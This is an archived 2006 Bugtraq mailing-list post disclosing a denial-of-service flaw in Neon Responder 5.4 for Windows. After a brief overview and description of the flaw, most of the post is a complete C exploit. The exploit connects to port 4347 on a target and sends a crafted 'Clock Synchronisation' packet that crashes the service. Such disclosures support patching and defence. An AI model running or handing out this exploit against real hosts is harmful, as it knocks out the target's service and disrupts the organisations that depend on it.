lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4443BC34.1030603@chello.at>
Date: Mon, 17 Apr 2006 18:03:00 +0200
From: Stefan Lochbihler <steve01@...llo.at>
To: bugtraq@...urityfocus.com, ewal@...tware.com.pl
Subject: Neon Responder (Dos,Exploit)


Author:                          Stefan Lochbihler
Date:                             17.04.2006
Affected Software:         Neon Responder for Windows
Software                        5.4
Software                        http://www.neon.com/NRwin.shtml
Attack:                           Dos



Overview:
Neon Responders greatly enhance the functionality of LANsurveyor
by providing LANsurveyor with direct access to computers with the
Responder client installed. This direct access allows LANsurveyor
to provide complete hardware and software asset reports, distribute
software, and directly manage the client computers, either
individually or as a group.


Details:
Through a specially crafted "Clock Synchronisation" packet an
access violation occur and Neon Responder stops immediately.




Exploit:
/* Stefan Lochbihler*/

#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>

#pragma comment(lib,"ws2_32")

#define PORT 4347
char CLOCK_MSG [] = 
"\x00\x0e\x5a\x00\x4c\xe9\x24\xb1\x17\x88\x40\x84";   //Password = ""

void usage (char*);
void endpgr (char *,SOCKET, char*);
unsigned long gethost (char *);


int main(int argc, char *argv[])
{
 
    WSADATA wsa;
    SOCKET client;
    sockaddr_in peer;
    WORD wsVersion;

    char sendbuffer[16]="";
    char recvbuffer[16]="";
    unsigned long host=0;
    int err=0;

    if(argc<2)
      usage(argv[0]);

    printf("\n~~~~~~ Neon Responder DoS - (c) by Stefan Lochbihler 
~~~~~~\n\n");


    if(WSAStartup(wsVersion=MAKEWORD(2,2),&wsa)!=0)
    {
        printf("WSAStartup() fail\n");
        exit(0);
    }

    printf("%s:[+] Try to create socket\n",argv[0]);
    client=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    if(client==INVALID_SOCKET)
       endpgr(argv[0],client,"[-] socket() fail");

    printf("%s:[+] Lookup host\n",argv[0]);
    if(!(host=gethost(argv[1])))
       endpgr(argv[0],client,"[-] host not found !");

    peer.sin_family = AF_INET;
    peer.sin_port = htons(PORT);
    peer.sin_addr.s_addr = host;
    
    printf("%s:[+] Connect to %s\n",argv[0],argv[1]);
    err=connect(client,(SOCKADDR*)&peer,sizeof(struct sockaddr_in));
    if(err)
      endpgr(argv[0],client,"[-] connect() fail");

    memcpy(sendbuffer,CLOCK_MSG,sizeof(CLOCK_MSG));
    
    printf("%s:[+] Try to send packet\n",argv[0]);
    err=send(client,sendbuffer,sizeof(sendbuffer),0);
    err=recv(client,recvbuffer,sizeof(recvbuffer)-1,0);

    endpgr(argv[0],client,"[+] End successfully");

    return 0;

}

void usage(char *pgrname)
{
printf("\n~~~~~~ Neon Responder DoS - (c) by Stefan Lochbihler ~~~~~~\n\n");
printf("%s: <Targethost>\n",pgrname);
exit(0);
}

void endpgr (char *pgrname, SOCKET client,char *msg)
{
    printf("%s:%s\n",pgrname,msg);
    WSACleanup();
    closesocket(client);
    exit(0);
}

unsigned long gethost(char *targethost)
{
unsigned long host=0;
hostent *phost=NULL;


host=inet_addr(targethost);
if(host==INADDR_NONE)
{
    if((phost=gethostbyname(targethost))==NULL)
       return 0;
    host=*(unsigned long*)phost->h_addr;
}

return host;   
}


Vendor Status: The Vendor is informed !


Discovered and Copyright by
Lochbihler Stefan
http://www.xion-security.at


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ